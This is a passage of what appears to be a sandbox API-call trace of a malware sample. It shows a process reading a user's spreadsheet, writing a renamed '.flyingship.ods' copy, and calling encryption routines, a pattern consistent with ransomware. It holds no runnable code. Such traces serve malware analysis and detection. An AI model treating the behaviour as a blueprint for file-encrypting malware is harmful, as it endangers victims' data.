hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.299] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.299] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.299] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.300] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqvkybnjluto.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.300] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.300] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0171.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0171.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.301] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0171.301] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0171.301] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0171.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0171.303] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0171.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0171.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0171.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0171.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0171.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.flyingship.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqvkybnjluto.flyingship.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0171.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0171.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0171.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0171.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.305] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0171.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0171.306] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0171.306] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0171.306] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0171.307] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0171.307] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x8f0a, lpOverlapped=0x0) returned 1 [0171.310] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0171.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f0a) returned 0x9e5190 [0171.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0171.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0171.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0171.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f0a) returned 0x9ee0a8 [0171.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0171.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0171.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f0a) returned 0x9e5190 [0171.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0171.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0171.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0171.313] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.313] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0171.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f0a) returned 0x9e5190 [0171.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0171.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0171.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f0a) returned 0xa5f008 [0171.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0171.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0171.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0171.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0171.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0171.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0171.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.317] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b 